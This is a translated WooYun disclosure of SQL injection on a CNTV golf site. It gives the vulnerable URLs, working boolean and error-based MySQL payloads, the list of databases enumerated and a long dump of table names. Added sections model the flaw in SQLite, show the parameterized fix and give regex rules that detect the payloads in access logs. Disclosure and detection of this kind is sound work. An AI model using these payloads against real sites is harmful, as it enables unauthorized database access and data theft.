
Vulnerability summary

Defect ID: wooyun-2014-080093

Title: SQL injection on a China Network Television (CNTV) site affecting a large number of databases

Vendor: 中国网络电视台 (China Network Television, CNTV)

Author: 紫霞仙子

Submitted: 2014-10-20 12:03

Fix date: 2014-12-04 12:04

Public date: 2014-12-04 12:04

Vulnerability type: SQL injection

Severity (self-assessed): Medium

Self-assessed Rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-10-20: details sent to the vendor, awaiting vendor response
2014-10-24: vendor confirmed; details visible to the vendor only
2014-11-03: details disclosed to core white hats and domain experts
2014-11-13: details disclosed to regular white hats
2014-11-23: details disclosed to intern white hats
2014-12-04: details disclosed to the public

Brief description:

Didn't have breakfast this morning!

Detailed description:

Injection exists in several places:
1.http://golf.cctv.com/e/extend/court/court_search.php?pt=%E5%8C%97%E4%BA%AC
A single quote appended to pt triggers a MySQL error (the \xE5\x8C\x97\xE4\xBA\xAC bytes are the UTF-8 encoding of 北京, the original pt value):
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\xE5\x8C\x97\xE4\xBA\xAC''' at line 1
select count(*) as total from photo_golf.court_information where region = '北京''
Payload: pt=%E5%8C%97%E4%BA%AC' AND 7950=7950 AND 'SfSw'='SfSw
Payload: pt=%E5%8C%97%E4%BA%AC' AND (SELECT 4139 FROM(SELECT COUNT(*),CONCAT(0x7169616d71,(SELECT (CASE WHEN (4139=4139) THEN 1 ELSE 0 END)),0x7171667371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'OOVO'='OOVO
---
2.http://golf.cctv.com/e/extend/dc_list.php?key=
Payload: key=%' AND EXTRACTVALUE(4489,CONCAT(0x5c,0x716a696571,(SELECT (CASE WHEN (4489=4489) THEN 1 ELSE 0 END)),0x716f777a71)) AND '%'='
back-end DBMS: MySQL
available databases [11]:
[*] fungolf
[*] information_schema
[*] matchnews_sys_dev
[*] mysql
[*] new
[*] performance_schema
[*] photo_golf
[*] sgagolf
[*] sns
[*] test
[*] we7
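The error message quoted above shows how the first endpoint builds its query: the pt value is concatenated into a quoted string literal, so a quote in the input terminates the literal and everything after it is parsed as SQL. The following is an added example, not code from the report, from EmpireCMS or from the CNTV site. It models the reconstructed query (select count(*) ... where region = '<pt>') against an in-memory SQLite table with constructed rows (the real table is photo_golf.court_information; the rows and court names here are invented), runs the report's boolean payload through both the concatenated form and a parameterized form, and reproduces the single-quote error probe. The two MySQL-only error-based payloads (the FLOOR(RAND(0)*2) GROUP BY trick and EXTRACTVALUE) are not reproduced because SQLite has neither function.

```python
"""Added example: the court_search.php injection modelled in SQLite.

Assumption: the PHP behind court_search.php concatenates the pt parameter
into the query text exactly as the MySQL error in the report implies.
The table contents below are constructed sample data.
"""
import sqlite3

# Payloads taken verbatim from the report (pt parameter, URL-decoded).
PAYLOAD_TRUE = "北京' AND 7950=7950 AND 'SfSw'='SfSw"
# Control with the same shape but a false condition; a tool compares the two.
PAYLOAD_FALSE = "北京' AND 7950=7951 AND 'SfSw'='SfSw"
# The report's first probe: a bare trailing quote.
PROBE_QUOTE = "北京'"


def make_db():
    """Constructed stand-in for photo_golf.court_information."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE court_information (id INTEGER PRIMARY KEY, name TEXT, region TEXT)"
    )
    conn.executemany(
        "INSERT INTO court_information (name, region) VALUES (?, ?)",
        [("Court A", "北京"), ("Court B", "北京"), ("Court C", "上海")],
    )
    return conn


def build_vulnerable_query(pt):
    """String concatenation: the user value lands inside the quotes unescaped,
    which is the construction the report's error message reveals."""
    return "select count(*) as total from court_information where region = '" + pt + "'"


def count_vulnerable(conn, pt):
    """Execute the concatenated query; payload text becomes SQL."""
    return conn.execute(build_vulnerable_query(pt)).fetchone()[0]


def count_safe(conn, pt):
    """Parameterized query: the value travels separately from the SQL text,
    so a quote in pt can never terminate the literal."""
    return conn.execute(
        "select count(*) as total from court_information where region = ?", (pt,)
    ).fetchone()[0]


def single_quote_errors(conn):
    """True if the bare-quote probe produces a syntax error, as in the report."""
    try:
        count_vulnerable(conn, PROBE_QUOTE)
    except sqlite3.OperationalError:
        return True
    return False


def boolean_blind_oracle(conn, pt_true, pt_false):
    """Confirmation step a tool performs: a true and a false condition of
    identical shape give different results only if the input is executed."""
    return count_vulnerable(conn, pt_true) != count_vulnerable(conn, pt_false)


if __name__ == "__main__":
    conn = make_db()
    print(build_vulnerable_query(PAYLOAD_TRUE))
    print("vulnerable, true condition :", count_vulnerable(conn, PAYLOAD_TRUE))   # 2
    print("vulnerable, false condition:", count_vulnerable(conn, PAYLOAD_FALSE))  # 0
    print("safe, payload as a value   :", count_safe(conn, PAYLOAD_TRUE))         # 0
    print("safe, honest value         :", count_safe(conn, "北京"))               # 2
    print("bare quote raises an error :", single_quote_errors(conn))              # True
    print("injectable                 :", boolean_blind_oracle(conn, PAYLOAD_TRUE, PAYLOAD_FALSE))
```

The parameterized form is the fix: with the value bound as a parameter, the whole payload is compared against the region column as one string and matches nothing, and no quoting rules have to be got right by hand. PHP's mysqli and PDO prepared statements give the same separation of query text from data.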
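The three payloads above (a quote followed by an N=N tautology, a FLOOR(RAND(0)*2) GROUP BY subquery over INFORMATION_SCHEMA, and EXTRACTVALUE with hex markers) are the standard error-based and boolean-based shapes that automated injection tools emit, and they survive URL-encoding in a web server's access log. As an added example, not part of the report, the following Python decodes each request's query string and flags values that match those shapes. The log lines are constructed for this example in Apache access-log style, using the report's real paths and payloads percent-encoded as a client would send them; the timestamps and the client IPs (documentation ranges) are invented.

```python
"""Added example: flag the report's injection payloads in access-log lines.

The rules below are derived only from the payload shapes quoted in the
report; they are signatures for this family of probes, not a complete
SQL-injection detector.
"""
import re
from urllib.parse import parse_qsl, urlsplit

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

RULES = {
    # ' AND 7950=7950 : literal closed, then a tautology of the form N=N
    "boolean_tautology": re.compile(r"'\s*AND\s+(\d+)=\1\b", re.I),
    # FLOOR(RAND(0)*2) ... GROUP BY : MySQL duplicate-key error-based extraction
    "floor_rand_groupby": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    # EXTRACTVALUE( : MySQL XPath error-based extraction
    "extractvalue_xpath": re.compile(r"EXTRACTVALUE\s*\(", re.I),
    # CONCAT(0x...) : hex markers used to locate the leaked value in the error text
    "hex_marker_concat": re.compile(r"CONCAT\s*\(\s*0x[0-9a-f]+", re.I),
    "information_schema": re.compile(r"INFORMATION_SCHEMA\.", re.I),
}


def classify(value):
    """Return the names of every rule a decoded parameter value triggers."""
    hits = [name for name, rx in RULES.items() if rx.search(value)]
    # The report's first probe is a lone quote with no keyword at all; an odd
    # number of quotes is a weak signal that catches it (noisy on free text).
    if value.count("'") % 2 == 1:
        hits.append("odd_quote_count")
    return hits


def scan_log(text):
    """Parse access-log lines, URL-decode each query parameter, and return
    one finding per parameter value that triggers at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            rules = classify(value)
            if rules:
                findings.append({"ip": m.group("ip"), "path": parts.path,
                                 "param": param, "value": value, "rules": rules})
    return findings


# Constructed sample log: the report's paths and payloads, percent-encoded.
SAMPLE_LOG = """\
203.0.113.10 - - [20/Oct/2014:11:52:01 +0800] "GET /e/extend/court/court_search.php?pt=%E5%8C%97%E4%BA%AC HTTP/1.1" 200 5120
203.0.113.10 - - [20/Oct/2014:11:52:03 +0800] "GET /e/extend/court/court_search.php?pt=%E5%8C%97%E4%BA%AC%27 HTTP/1.1" 200 1843
203.0.113.10 - - [20/Oct/2014:11:52:04 +0800] "GET /e/extend/court/court_search.php?pt=%E5%8C%97%E4%BA%AC%27%20AND%207950%3D7950%20AND%20%27SfSw%27%3D%27SfSw HTTP/1.1" 200 5120
203.0.113.10 - - [20/Oct/2014:11:52:06 +0800] "GET /e/extend/court/court_search.php?pt=%E5%8C%97%E4%BA%AC%27%20AND%20%28SELECT%204139%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7169616d71%2C%28SELECT%20%28CASE%20WHEN%20%284139%3D4139%29%20THEN%201%20ELSE%200%20END%29%29%2C0x7171667371%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27OOVO%27%3D%27OOVO HTTP/1.1" 200 1902
203.0.113.10 - - [20/Oct/2014:11:53:10 +0800] "GET /e/extend/dc_list.php?key=%25%27%20AND%20EXTRACTVALUE%284489%2CCONCAT%280x5c%2C0x716a696571%2C%28SELECT%20%28CASE%20WHEN%20%284489%3D4489%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716f777a71%29%29%20AND%20%27%25%27%3D%27 HTTP/1.1" 200 1870
198.51.100.7 - - [20/Oct/2014:11:53:12 +0800] "GET /e/extend/dc_list.php?key=golf HTTP/1.1" 200 7722
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["path"], f["param"], f["rules"])
```

Decoding before matching matters: the raw log holds `%27` and `%28`, not `'` and `(`, so a pattern applied to the undecoded line misses everything. The legitimate requests (pt=北京 and key=golf) trigger nothing, the bare-quote probe is caught only by the weak odd-quote rule, and each automated payload trips several rules at once, which is the combination worth alerting on.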

Proof of vulnerability:

Posting part of the database (table names from the dump):
| phome_ecms_infoclass_qiuchang |
| phome_ecms_infoclass_scheduler |
| phome_ecms_infoclass_shop |
| phome_ecms_infoclass_teacher |
| phome_ecms_infoclass_vipmember |
| phome_ecms_infotmp_article |
| phome_ecms_infotmp_course |
| phome_ecms_infotmp_customer |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_educ |
| phome_ecms_infotmp_flash |
| phome_ecms_infotmp_golfcourse |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_mark |
| phome_ecms_infotmp_money |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_photo |
| phome_ecms_infotmp_player |
| phome_ecms_infotmp_point |
| phome_ecms_infotmp_qiuchang |
| phome_ecms_infotmp_scheduler |
| phome_ecms_infotmp_shop |
| phome_ecms_infotmp_teacher |
| phome_ecms_infotmp_vipmember |
| phome_ecms_mark |
| phome_ecms_mark_data_1 |
| phome_ecms_mark_doc |
| phome_ecms_mark_doc_data |
| phome_ecms_money |
| phome_ecms_money_data_1 |
| phome_ecms_money_doc |
| phome_ecms_money_doc_data |
| phome_ecms_movie |
| phome_ecms_movie_bk |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_data_1_bk |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_bk |
| phome_ecms_movie_doc_data |
| phome_ecms_movie_doc_data_bk |
| phome_ecms_news |
| phome_ecms_news_copy |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_photo |
| phome_ecms_photo_data_1 |
| phome_ecms_photo_doc |
| phome_ecms_photo_doc_data |
| phome_ecms_player |
| phome_ecms_player_data_1 |
| phome_ecms_player_doc |
| phome_ecms_player_doc_data |
| phome_ecms_point |
| phome_ecms_point_data_1 |
| phome_ecms_point_doc |
| phome_ecms_point_doc_data |
| phome_ecms_qiuchang |
| phome_ecms_qiuchang_data_1 |
| phome_ecms_qiuchang_doc |
| phome_ecms_qiuchang_doc_data |
| phome_ecms_scheduler |
| phome_ecms_scheduler_data_1 |
| phome_ecms_scheduler_doc |
| phome_ecms_scheduler_doc_data |
| phome_ecms_shop |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_ecms_teacher |
| phome_ecms_teacher_data_1 |
| phome_ecms_teacher_doc |
| phome_ecms_teacher_doc_data |
| phome_ecms_vipmember |
| phome_ecms_vipmember_data_1 |
| phome_ecms_vipmember_doc |
| phome_ecms_vipmember_doc_data |
| phome_edm |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadclick |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewschecktext |
| phome_enewsclass |
| phome_enewsclassadd |
| phome_enewsclasstemp |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewspl_data_1 |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspostdata |
| phome_enewspublic |
| phome_enewspubtemp |
| phome_enewsqf |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtempclass |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewsspacestyle |
| phome_enewssql |
| phome_enewstable |
| phome_enewstask |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuserjs |
| phome_enewsuserlist |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewswapstyle |
| phome_enewswords |
| phome_enewswriter |
| phome_enewszt |
| phome_enewsztclass |
| scheduler |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
| uchome_ad |
| uchome_adminsession |
| uchome_album |
| uchome_app_ask |
| uchome_app_ask_reply |
| uchome_app_brand |
| uchome_app_brand_player |
| uchome_app_brand_reply |
| uchome_app_brand_view |
| uchome_appcreditlog |
| uchome_blacklist |
| uchome_block |
| uchome_blog |
| uchome_blogfield |
| uchome_cache |
| uchome_class |
| uchome_click |
| uchome_clickuser |
| uchome_comment |
| uchome_config |
| uchome_creditlog |
| uchome_creditrule |
| uchome_cron |
| uchome_data |
| uchome_docomment |
| uchome_doing |
| uchome_event |
| uchome_eventclass |
| uchome_eventfield |
| uchome_eventinvite |
| uchome_eventpic |
| uchome_feed |
| uchome_friend |
| uchome_friendguide |
| uchome_friendlog |
| uchome_invite |
| uchome_log |
| uchome_magic |
| uchome_magicinlog |
| uchome_magicstore |
| uchome_magicuselog |
| uchome_mailcron |
| uchome_mailqueue |
| uchome_member |
| uchome_mtag |
| uchome_mtaginvite |
| uchome_myapp |
| uchome_myinvite |
| uchome_news_category |
| uchome_news_detail |
| uchome_news_responds |
| uchome_notification |
| uchome_pic |
| uchome_picfield |
| uchome_poke |
| uchome_poll |
| uchome_pollfield |
| uchome_polloption |
| uchome_polluser |
| uchome_post |
| uchome_profield |
| uchome_profilefield |
| uchome_report |
| uchome_session |
| uchome_share |
| uchome_show |
| uchome_space |
| uchome_spacefield |
| uchome_spacelog |
| uchome_stat |
| uchome_statuser |
| uchome_tag |
| uchome_tagblog |
| uchome_tagspace |
| uchome_task |
| uchome_thread |
| uchome_topic |
| uchome_topicuser |
| uchome_userapp |
| uchome_userappfield |
| uchome_userevent |
| uchome_usergroup |
| uchome_userlog |
| uchome_usermagic |
| uchome_usertask |
| uchome_visitor |

Fix recommendation:

~~

Copyright notice: please credit 紫霞仙子@乌云 (WooYun) when reposting


Vulnerability response

Vendor response:

Severity: High

Rank: 10

Confirmed: 2014-10-24 10:49

Vendor reply:

Thank you very much, we will remediate this service as soon as possible! Thank you for your support and help!

Latest status:

None



Comments

  1. 2014-10-26 18:35 | sutdy ( regular white hat | Rank:101 vulns:33 | 0.0)

    Holy crap, CNTV!

  2. 2014-12-04 15:44 | 脚本小伙 ( intern white hat | Rank:52 vulns:15 | 小书童)

    EmpireCMS code... wonder whether the other sites have it too

  3. 2015-07-07 16:42 | zsmj ( intern white hat | Rank:40 vulns:5 | 不问留言,不言寂寞!)

    Probably all found with tools, run in batch

  4. 2015-07-07 16:48 | 紫霞仙子 ( regular white hat | Rank:2027 vulns:279 | 天天向上 !!!)

    @zsmj Automated tools are gradually replacing manual labour; saves time and is efficient.

  5. 2015-07-08 08:41 | zsmj ( intern white hat | Rank:40 vulns:5 | 不问留言,不言寂寞!)

    So could the fairy share her super tool? 584266759@qq.com The fairy is heaven, the fairy is earth, the fairy is the one and only legend

  6. 2015-07-08 10:02 | 紫霞仙子 ( regular white hat | Rank:2027 vulns:279 | 天天向上 !!!)

    @zsmj Learn step by step and write your own, or use the tools that are publicly available. Study first.

  7. 2015-07-08 12:11 | zsmj ( intern white hat | Rank:40 vulns:5 | 不问留言,不言寂寞!)

    @紫霞仙子 (;′⌒`)